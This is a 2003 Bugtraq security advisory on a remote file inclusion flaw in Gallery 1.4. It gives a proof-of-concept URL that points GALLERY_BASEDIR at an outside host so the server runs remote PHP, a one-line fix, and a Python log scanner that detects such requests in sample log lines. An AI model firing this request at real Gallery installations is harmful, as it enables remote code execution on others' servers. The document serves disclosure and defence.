Date: 11 Oct 2003 16:13:00 -0000
From: Peter "Stöckli" <pcs@...tquest.com>
To: bugtraq@...urityfocus.com
Subject: Gallery 1.4 including file vulnerability

Gallery 1.4 including file vulnerability

-Background Information-
Gallery is a Web-based software product that lets you manage photos on any Web site that offers PHP support. With Gallery you can easily create and maintain albums of photos via an intuitive interface. Photo management includes automatic thumbnail creation, image resizing, rotation, ordering, captioning, searching, and more. Albums can have read, write, and caption permissions per individual authenticated user for an additional level of privacy. Gallery is installed at perhaps 20000 locations.

-Proof of concept-
It is possible to include any PHP file from a remote host and execute it on the target's server.
The following request works:
http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tester/
If the file "http://tester/util.php" exists, it is included. If PHP is not available on the "tester" host, that file could look like this:

<?php echo "Vulnerable"; ?>

or like this, if PHP is available on the "tester" host:

<?php
echo "<?php die(\"Vulnerable\"); ?>";
?>

-Solution-
Change the following lines in the index.php file in the setup folder:

if (!isset($GALLERY_BASEDIR)) {
	$GALLERY_BASEDIR = '../';
}

to this:

	$GALLERY_BASEDIR = '../';
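As an added defender-side example (not part of the advisory and not Gallery's code), the Python below scans constructed Apache-style access-log lines for requests that override GALLERY_BASEDIR as in the proof of concept above, separating remote URLs from plain local-path overrides; the log lines, hosts and IP addresses are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Oct/2003:16:13:00 +0000] "GET /gallery/setup/index.php?GALLERY_BASEDIR=http://tester/ HTTP/1.0" 200 512
198.51.100.7 - - [11/Oct/2003:16:14:02 +0000] "GET /gallery/setup/index.php HTTP/1.1" 200 2048
203.0.113.5 - - [11/Oct/2003:16:15:10 +0000] "GET /gallery/setup/index.php?GALLERY_BASEDIR=%68ttp%3a%2f%2ftester%2f HTTP/1.0" 200 512
192.0.2.9 - - [11/Oct/2003:16:16:30 +0000] "GET /gallery/albums/index.php?GALLERY_BASEDIR=../ HTTP/1.1" 200 300
"""

# ip, ident, user, [timestamp], "METHOD target PROTOCOL", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# URL schemes that would make include() fetch code from another host.
REMOTE_SCHEMES = ("http", "https", "ftp")


def classify_request(target):
    """Return 'remote', 'local-override' or None for one request target.

    With register_globals enabled, a request parameter becomes the PHP global
    $GALLERY_BASEDIR, which is why the isset() guard shown above can be
    bypassed; any value supplied by the client is therefore worth flagging.
    """
    query = urlsplit(target).query
    # parse_qs percent-decodes values, so %68ttp%3a%2f%2f... is seen as http://
    values = parse_qs(query, keep_blank_values=True).get("GALLERY_BASEDIR")
    if not values:
        return None
    for value in values:
        if urlsplit(value).scheme.lower() in REMOTE_SCHEMES:
            return "remote"
    return "local-override"


def scan_log(text):
    """Return (ip, target, verdict) for every request that sets GALLERY_BASEDIR."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # skip lines that are not in common log format
        verdict = classify_request(match.group("target"))
        if verdict:
            findings.append((match.group("ip"), match.group("target"), verdict))
    return findings


if __name__ == "__main__":
    for ip, target, verdict in scan_log(SAMPLE_LOG):
        print(f"{verdict:15} {ip:15} {target}")
```

Because the source includes a request-supplied base directory unconditionally, a local-path override is also reported; after applying the fix above the parameter is ignored, but hits in older logs still show who probed the installation.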

-Related URLs-
http://gallery.sourceforge.net/
https://sourceforge.net/projects/gallery/

Peter Stöckli
RQ Labs
Rootquest
Switzerland
